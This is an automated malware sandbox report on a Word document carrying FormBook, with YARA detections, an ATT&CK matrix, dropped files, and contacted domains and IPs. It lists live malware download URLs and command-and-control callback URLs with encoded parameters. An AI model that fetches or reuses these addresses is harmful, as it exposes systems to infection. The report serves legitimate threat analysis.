Source: explorer.exe, 00000006.00000002.2355833533.00000000006F0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000002.2355507116.00000000001F5000.00000004.00000020.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000006.00000002.2355833533.00000000006F0000.00000002.00000001.sdmp	Binary or memory string: !Progman

Language, Device and Operating System Detection:

Source: C:\Users\Public\69577.exe

Queries volume information: C:\Users\Public\69577.exe VolumeInformation

Jump to behavior

Source: C:\Users\Public\69577.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000007.00000002.2355474792.0000000000260000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2355301607.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2158148340.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2158367051.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2355676644.0000000001B10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2114973592.0000000003E52000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2158337598.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2114562309.0000000003CE6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000007.00000002.2355474792.0000000000260000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2355301607.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2158148340.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2158367051.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2355676644.0000000001B10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2114973592.0000000003E52000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2158337598.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2114562309.0000000003CE6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Spearphishing Link1	Shared Modules1	Valid Accounts1	Valid Accounts1	Disable or Modify Tools1	Credential API Hooking1	File and Directory Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Valid Accounts1	Exploitation for Client Execution13	Boot or Logon Initialization Scripts	Access Token Manipulation1	Deobfuscate/Decode Files or Information1	LSASS Memory	System Information Discovery113	Remote Desktop Protocol	Credential API Hooking1	Exfiltration Over Bluetooth	Encrypted Channel1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Command and Scripting Interpreter1	Logon Script (Windows)	Process Injection812	Obfuscated Files or Information3	Security Account Manager	Query Registry1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Software Packing1	NTDS	Security Software Discovery221	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol12	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Rootkit1	LSA Secrets	Virtualization/Sandbox Evasion3	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Masquerading121	Cached Domain Credentials	Process Discovery2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Valid Accounts1	DCSync	Remote System Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Access Token Manipulation1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Virtualization/Sandbox Evasion3	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Process Injection812	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Hidden Files and Directories1	Input Capture	Permission Groups Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
IMG-11862.doc	39%	Virustotal		Browse
IMG-11862.doc	24%	ReversingLabs	Document-Office.Exploit.CVE-2017-11882

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\IMG-11862[1].pdf	100%	Joe Sandbox ML
C:\Users\Public\69577.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\IMG-11862[1].pdf	43%	ReversingLabs	ByteCode-MSIL.Trojan.Tnega
C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	0%	ReversingLabs
C:\Users\Public\69577.exe	43%	ReversingLabs	ByteCode-MSIL.Trojan.Tnega

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
5.2.AddInProcess32.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File
7.2.systray.exe.c0000.0.unpack	100%	Avira	TR/Dropper.Gen		Download File

Domains

Source	Detection	Scanner	Label	Link
neuromedic.com.br	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://neuromedic.com.br/cgi./IMG-11862.pdf	100%	Avira URL Cloud	malware
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://pki.goog/gsr2/GTS1O1.crt0	0%	URL Reputation	safe
http://pki.goog/gsr2/GTS1O1.crt0	0%	URL Reputation	safe
http://pki.goog/gsr2/GTS1O1.crt0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://ocsp.pki.goog/gsr202	0%	URL Reputation	safe
http://ocsp.pki.goog/gsr202	0%	URL Reputation	safe
http://ocsp.pki.goog/gsr202	0%	URL Reputation	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
http://treyresearch.net	0%	URL Reputation	safe
http://treyresearch.net	0%	URL Reputation	safe
http://treyresearch.net	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://ocsp.pki.goog/gts1o1core0	0%	URL Reputation	safe
http://ocsp.pki.goog/gts1o1core0	0%	URL Reputation	safe
http://ocsp.pki.goog/gts1o1core0	0%	URL Reputation	safe
http://crl.pki.goog/GTS1O1core.crl0	0%	URL Reputation	safe
http://crl.pki.goog/GTS1O1core.crl0	0%	URL Reputation	safe
http://crl.pki.goog/GTS1O1core.crl0	0%	URL Reputation	safe
http://www.%s.com	0%	URL Reputation	safe
http://www.%s.com	0%	URL Reputation	safe
http://www.%s.com	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://%s.com	0%	URL Reputation	safe
http://%s.com	0%	URL Reputation	safe
http://%s.com	0%	URL Reputation	safe
http://www.bucklandnewton.net/bsl/?NN=GgBvVf5PQIOdcMEbYgw1IQ+nD3ax/bg71NWpn/5pwbnZwl7mOlCqEE4iezeCyF4VQz1gwg==&Epu=zv50BpeHpnjp	0%	Avira URL Cloud	safe
http://crl.pki.goog/gsr2/gsr2.crl0?	0%	URL Reputation	safe
http://crl.pki.goog/gsr2/gsr2.crl0?	0%	URL Reputation	safe
http://crl.pki.goog/gsr2/gsr2.crl0?	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://servername/isapibackend.dll	0%	Avira URL Cloud	safe
http://www.theprintshop.ink/bsl/?NN=iMJGa3GxI6UtmkdzIO42CvbImt4iBZLhcRTuFhGcNs1w9EATRUa5v41vQqTOTJ8d8FsBhw==&Epu=zv50BpeHpnjp	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
neuromedic.com.br	177.70.106.69	true	false	1%, Virustotal, Browse	unknown
bit.ly	67.199.248.10	true	false		high
www.theprintshop.ink	35.208.61.46	true	true		unknown
www.bucklandnewton.net	208.91.197.39	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://neuromedic.com.br/cgi./IMG-11862.pdf	true	Avira URL Cloud: malware	unknown
http://www.bucklandnewton.net/bsl/?NN=GgBvVf5PQIOdcMEbYgw1IQ+nD3ax/bg71NWpn/5pwbnZwl7mOlCqEE4iezeCyF4VQz1gwg==&Epu=zv50BpeHpnjp	true	Avira URL Cloud: safe	unknown
http://bit.ly/3oj1Gnn	false		high
http://www.theprintshop.ink/bsl/?NN=iMJGa3GxI6UtmkdzIO42CvbImt4iBZLhcRTuFhGcNs1w9EATRUa5v41vQqTOTJ8d8FsBhw==&Epu=zv50BpeHpnjp	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.windows.com/pctv.	explorer.exe, 00000006.00000000.2121372528.0000000003C40000.00000002.00000001.sdmp	false		high
http://investor.msn.com	explorer.exe, 00000006.00000000.2121372528.0000000003C40000.00000002.00000001.sdmp	false		high
http://www.msnbc.com/news/ticker.txt	explorer.exe, 00000006.00000000.2121372528.0000000003C40000.00000002.00000001.sdmp	false		high
http://crl.entrust.net/server1.crl0	69577.exe, 00000004.00000002.2108601096.000000000048D000.00000004.00000020.sdmp	false		high
http://ocsp.entrust.net03	69577.exe, 00000004.00000002.2108601096.000000000048D000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	69577.exe, 00000004.00000002.2108601096.000000000048D000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://pki.goog/gsr2/GTS1O1.crt0	69577.exe, 00000004.00000002.2111325978.00000000023E7000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.diginotar.nl/cps/pkioverheid0	69577.exe, 00000004.00000002.2108601096.000000000048D000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://ocsp.pki.goog/gsr202	69577.exe, 00000004.00000002.2108601096.000000000048D000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.hotmail.com/oe	explorer.exe, 00000006.00000000.2121372528.0000000003C40000.00000002.00000001.sdmp	false		high
https://pki.goog/repository/0	69577.exe, 00000004.00000002.2108601096.000000000048D000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://treyresearch.net	explorer.exe, 00000006.00000000.2133467321.000000000A330000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://auto.search.msn.com/response.asp?MT=	explorer.exe, 00000006.00000000.2133467321.000000000A330000.00000008.00000001.sdmp	false		high
http://schema.org/WebPage	69577.exe, 00000004.00000002.2111325978.00000000023E7000.00000004.00000001.sdmp	false		high
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	69577.exe, 00000004.00000002.2108601096.000000000048D000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	69577.exe, 00000004.00000002.2118681264.0000000005B20000.00000002.00000001.sdmp, explorer.exe, 00000006.00000002.2356037346.0000000001C70000.00000002.00000001.sdmp	false		high
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv	explorer.exe, 00000006.00000000.2113821795.0000000000260000.00000004.00000020.sdmp	false		high
http://ocsp.pki.goog/gts1o1core0	69577.exe, 00000004.00000002.2111325978.00000000023E7000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://investor.msn.com/	explorer.exe, 00000006.00000000.2121372528.0000000003C40000.00000002.00000001.sdmp	false		high
http://www.msn.com/?ocid=iehp	explorer.exe, 00000006.00000000.2122554413.00000000042CB000.00000004.00000001.sdmp	false		high
http://crl.pki.goog/GTS1O1core.crl0	69577.exe, 00000004.00000002.2111325978.00000000023E7000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.%s.com	explorer.exe, 00000006.00000000.2133467321.000000000A330000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://www.piriform.com/ccleaner	explorer.exe, 00000006.00000000.2121116386.00000000039F4000.00000004.00000001.sdmp	false		high
http://www.%s.comPA	69577.exe, 00000004.00000002.2118681264.0000000005B20000.00000002.00000001.sdmp, explorer.exe, 00000006.00000002.2356037346.0000000001C70000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://%s.com	explorer.exe, 00000006.00000000.2133467321.000000000A330000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://crl.pki.goog/gsr2/gsr2.crl0?	69577.exe, 00000004.00000002.2108601096.000000000048D000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://ocsp.entrust.net0D	69577.exe, 00000004.00000002.2108601096.000000000048D000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	69577.exe, 00000004.00000002.2111272817.00000000023C1000.00000004.00000001.sdmp	false		high
https://secure.comodo.com/CPS0	69577.exe, 00000004.00000002.2108601096.000000000048D000.00000004.00000020.sdmp	false		high
http://servername/isapibackend.dll	explorer.exe, 00000006.00000000.2123702347.0000000004F30000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	low
http://crl.entrust.net/2048ca.crl0	69577.exe, 00000004.00000002.2108601096.000000000048D000.00000004.00000020.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
35.208.61.46	unknown	United States	19527	GOOGLE-2US	true
208.91.197.39	unknown	Virgin Islands (BRITISH)	40034	CONFLUENCE-NETWORK-INCVG	true
177.70.106.69	unknown	Brazil	262545	MandicSABR	false
67.199.248.10	unknown	United States	396982	GOOGLE-PRIVATE-CLOUDUS	false

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	345148
Start date:	27.01.2021
Start time:	19:08:26
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 6s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	IMG-11862.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winDOC@9/13@4/4
EGA Information:	Failed
HDC Information:	Successful, ratio: 11% (good quality ratio 10.5%) Quality average: 75.2% Quality standard deviation: 26.4%
HCA Information:	Successful, ratio: 99% Number of executed functions: 107 Number of non-executed functions: 51
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 172.217.23.68 Excluded domains from analysis (whitelisted): www.google.com Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
19:08:38	API Interceptor	82x Sleep call for process: EQNEDT32.EXE modified
19:08:42	API Interceptor	77x Sleep call for process: 69577.exe modified
19:08:51	API Interceptor	88x Sleep call for process: AddInProcess32.exe modified
19:09:14	API Interceptor	160x Sleep call for process: systray.exe modified
19:09:51	API Interceptor	1x Sleep call for process: explorer.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
208.91.197.39	SKM_C221200706052800.exe	Get hash	malicious	Browse	www.communityinsuranceut.com/s9zh/?aFNTkfLx=pkDVUvjZrO/wjNk8c7NHDXzL5H+kqxsq73w3/FUzwNhwu18jKLLT84svQycvaxUnudjE&O2MtVN=iJEt_VihLTLX2JB0
	o0Ka2BsNBq.exe	Get hash	malicious	Browse	www.argusproductionsus.com/8rg4/?pPX=EFQD_FT0CVqx&AdkDpFa=/EUx6Zal1ALluQYRoHhKH8fRw1WA1MBiwq5fKhvCvJ9uHm/fSkJJztyj3d1Av3XfCOX/ZJU8rg==
	PO890299700006.xlsx	Get hash	malicious	Browse	www.argusproductionsus.com/8rg4/?cF=/EUx6Zag1HLhuAUdqHhKH8fRw1WA1MBiwqhPWizDrp9vHXTZV0YFlpKh071G3WPXO4jeAw==&SBZ=epg8b
	5j6RsnL8zx.exe	Get hash	malicious	Browse	www.argusproductionsus.com/8rg4/?Txlp=/EUx6Zal1ALluQYRoHhKH8fRw1WA1MBiwq5fKhvCvJ9uHm/fSkJJztyj3eZQzGLkF7+u&OHX=JRmh
	fdxzZJ99bS.exe	Get hash	malicious	Browse	www.argusproductionsus.com/8rg4/?jP=/EUx6Zal1ALluQYRoHhKH8fRw1WA1MBiwq5fKhvCvJ9uHm/fSkJJztyj3eZQzGLkF7+u&bv4=YVM8sjIPCHML-RZP
	order FTH2004-005.exe	Get hash	malicious	Browse	www.communityinsuranceut.com/s9zh/?EPq8iH=pkDVUvjZrO/wjNk8c7NHDXzL5H+kqxsq73w3/FUzwNhwu18jKLLT84svQycvaxUnudjE&CX6pD=7n9piL3
	invoice + packing list DEC 3 by DHL.exe	Get hash	malicious	Browse	www.potrillas.com/ihm3/?U48=HvshaPc8d8ol&M2M=c2PAOBSSOZPcB6qK0/vt1cgQXXJrWGnhg4EtOZxX24gkl6t8PtECLBQ2SmYSO5LXjW1e
	w4fNtjZBEH.exe	Get hash	malicious	Browse	www.visacoincard.com/xnc/?2d=3fhlJ2NpFxSTNJL&lnPd=dKuJMJDWInUgmzajpInQduQqn4toHzINAGVDFywKs65z5Kn4pqDzcnkN6utuhmLrzG8VTPBnqw==
	enzUB9etyY.exe	Get hash	malicious	Browse	www.americastandproudagain.com/fs8/?_jqH7=hBg8OFaHu8o&ARR=9p35V3Y0QnhPJMAdx1z9xxXt1u9NKj7J5neU3YLkGviBaWhi7GibFKbSWTlziWcdTp+Q
	SOA109216.exe	Get hash	malicious	Browse	www.visacoincard.com/xnc/?MJBD=FdFp3fCHnzolbffP&qr8=dKuJMJDWInUgmzajpInQduQqn4toHzINAGVDFywKs65z5Kn4pqDzcnkN6tBt9WHT+nBD
	PI109372.exe	Get hash	malicious	Browse	www.visacoincard.com/xnc/?8pdXBn8P=dKuJMJDWInUgmzajpInQduQqn4toHzINAGVDFywKs65z5Kn4pqDzcnkN6tBt9WHT+nBD&EZUpc0=LDKXxHJhtzTle
	PI41006.exe	Get hash	malicious	Browse	www.visacoincard.com/xnc/?bl=dKuJMJDWInUgmzajpInQduQqn4toHzINAGVDFywKs65z5Kn4pqDzcnkN6tBHim3T6lJD&MJBHa=GdqXjbDP-RddJJ
	Amacon Company profile & about us.exe	Get hash	malicious	Browse	www.cancerfactsnotfears.com/aqu2/?_TAHxl=ZL3hMDhPFVz&hbWhmPd=dtxQWPdHn6NuXQ8HTzR/XDH3EART4JDZAJG4ul8zTb6sGEfCwDOpw9K3NFCkcWLNcL+tZcqKkA==
	ASQ2109942.exe	Get hash	malicious	Browse	www.visacoincard.com/xnc/?Cj=dKuJMJDWInUgmzajpInQduQqn4toHzINAGVDFywKs65z5Kn4pqDzcnkN6tBt9WHT+nBD&D8P=Br-0dH
	yeni sipari#U015f.exe	Get hash	malicious	Browse	www.americastandproudagain.com/fs8/?vh=9p35V3Y0QnhPJMAdx1z9xxXt1u9NKj7J5neU3YLkGviBaWhi7GibFKbSWTlziWcdTp+Q&CR=Cp-DpJv
	INVOICE00891.exe	Get hash	malicious	Browse	www.translationsabc.net/zaer/
	1NEW ORDER.exe	Get hash	malicious	Browse	www.archiescafe.com/uz/
	ZT0-000QuoteRequest.doc	Get hash	malicious	Browse	www.pepemaxonline.com/ch35/?sj0PBp=q7M7an3Ompw6VpChS9+NSECSax2TXCPCirXhTEf4Bwcy7Kl/GhZYhT3Nw0iVi92U0/5dTUlVC7FqDkp1HmZFUg==&0pWte=1bqdIPZ
	index[1].htm	Get hash	malicious	Browse	www.kse.com.kw/sk-logabpstatus.php?a=Sk5kbWpXTWI1S0dLTlkvMjY1LzhzRDRzdC9jVmlJNTh6RWxSMzI2NWNYdzVybUthN0JrbGpyWURBNGhaVXptT2E5Y2M1QkRxYXR1V0lrTDkwSkR5c3dvY1FxR2xndHlRK3o4b3hHVVh2N289&b=false
	16doc0828.exe	Get hash	malicious	Browse	www.livemusicismedicine.com/mm/?VXUH=fqqTsh1NtZK4sa1eF7bFPBSN72MqGmPOKOxHsBcSfg5PhWJIIvKYimeExelOsZdb/ONW&i8=-ZqDAlf8oJXdj8jP
177.70.106.69	IMG-50230.doc	Get hash	malicious	Browse	neuromedic.com.br/cgi./IMG-50230.pdf

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
bit.ly	IMG-6661.doc	Get hash	malicious	Browse	67.199.248.10
	IMG-60612.doc	Get hash	malicious	Browse	67.199.248.11
	P.O 119735.doc__.rtf	Get hash	malicious	Browse	67.199.248.11
	IMG-50230.doc	Get hash	malicious	Browse	67.199.248.10
	IMG_155710.doc	Get hash	malicious	Browse	67.199.248.10
	IMG_761213.doc	Get hash	malicious	Browse	67.199.248.11
	IMG_4785.doc	Get hash	malicious	Browse	67.199.248.10
	IMG-51033.doc	Get hash	malicious	Browse	67.199.248.11
	IMG_688031.doc	Get hash	malicious	Browse	67.199.248.11
	IMG_68103.doc	Get hash	malicious	Browse	67.199.248.10
	DRAWING_22719.doc	Get hash	malicious	Browse	67.199.248.10
	FedEx 77258441873.doc	Get hash	malicious	Browse	67.199.248.11
	IMG_651023.doc	Get hash	malicious	Browse	67.199.248.10
	IMG_112237.doc	Get hash	malicious	Browse	67.199.248.10
	IMG_75513.doc	Get hash	malicious	Browse	67.199.248.10
	IMG_03991.doc	Get hash	malicious	Browse	67.199.248.10
	New Profit Distribution.pdf.lnk	Get hash	malicious	Browse	67.199.248.10
	CN-2nd Reminder-XXXXX1894--02072020073335073781.doc	Get hash	malicious	Browse	67.199.248.10
	IMG_15506.doc	Get hash	malicious	Browse	67.199.248.11
	IMG_167749.doc	Get hash	malicious	Browse	67.199.248.10
neuromedic.com.br	IMG-50230.doc	Get hash	malicious	Browse	177.70.106.69

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
GOOGLE-2US	ARCHIVOFile-20-012021.doc	Get hash	malicious	Browse	35.209.96.32
	Calculation-380472272-01262021.xlsm	Get hash	malicious	Browse	35.208.103.169
	453690-3012-QZS-9120501.doc	Get hash	malicious	Browse	35.214.159.46
	MPbBCArHPF.exe	Get hash	malicious	Browse	35.208.174.213
	TBKK E12101010.xlsx	Get hash	malicious	Browse	35.208.174.213
	ARCH-SO-930373.doc	Get hash	malicious	Browse	35.209.96.32
	Info_C_780929.doc	Get hash	malicious	Browse	35.214.159.46
	Factura.doc	Get hash	malicious	Browse	35.209.114.34
	DAT 30 122020 664_16167.doc	Get hash	malicious	Browse	35.214.159.46
	Beauftragung.doc	Get hash	malicious	Browse	35.209.114.34
	sample2.doc	Get hash	malicious	Browse	35.214.199.246
	55-2912.doc	Get hash	malicious	Browse	35.209.78.196
	DAT_G_0259067.doc	Get hash	malicious	Browse	35.214.169.246
	DAT_G_0259067.doc	Get hash	malicious	Browse	35.209.78.196
	Shipping Document PL&BL Draft01.exe	Get hash	malicious	Browse	35.208.179.96
	Shipping Document PL&BL Draft.exe	Get hash	malicious	Browse	35.214.23.27
	SHEXD2101127S_ShippingDocument_DkD.xlsx	Get hash	malicious	Browse	35.208.174.213
	YUAN PAYMENT.exe	Get hash	malicious	Browse	35.208.137.4
	Invoice_20210115122010.exe	Get hash	malicious	Browse	35.208.179.96
	PO#416421.exe	Get hash	malicious	Browse	35.208.174.213
CONFLUENCE-NETWORK-INCVG	0113 INV_PAK.xlsx	Get hash	malicious	Browse	208.91.197.91
	v07PSzmSp9.exe	Get hash	malicious	Browse	208.91.197.91
	win32.exe	Get hash	malicious	Browse	204.11.56.48
	Request.xlsx	Get hash	malicious	Browse	208.91.197.91
	mitbjisfe.js	Get hash	malicious	Browse	204.11.56.48
	documents_0084568546754.exe	Get hash	malicious	Browse	208.91.197.27
	D6mimHOcsr.exe	Get hash	malicious	Browse	208.91.197.27
	KTFvWHZDMe.exe	Get hash	malicious	Browse	208.91.197.27
	PO81105083.xlsx	Get hash	malicious	Browse	208.91.197.27
	tuMCqH36OF.exe	Get hash	malicious	Browse	208.91.197.27
	2021 DOCS.xlsx	Get hash	malicious	Browse	208.91.197.27
	SecuriteInfo.com.Trojan.PackedNET.509.28611.exe	Get hash	malicious	Browse	208.91.197.27
	Details...exe	Get hash	malicious	Browse	204.11.56.48
	KuPBIsrqbO.exe	Get hash	malicious	Browse	208.91.197.91
	Fdj5vhj87S.exe	Get hash	malicious	Browse	204.11.56.48
	_MVSEASEAL_RFQ_.xlsx	Get hash	malicious	Browse	209.99.64.33
	1D1PBttduH.exe	Get hash	malicious	Browse	208.91.197.91
	Statement Of Account.exe	Get hash	malicious	Browse	204.11.56.48
	yxYmHtT7uT.exe	Get hash	malicious	Browse	204.11.56.48
	notice of arrival.xlsx	Get hash	malicious	Browse	208.91.197.91
MandicSABR	IMG-50230.doc	Get hash	malicious	Browse	177.70.106.69
	http://gruposuporte.com.br/#9053pl500@cez.cz	Get hash	malicious	Browse	177.70.106.24
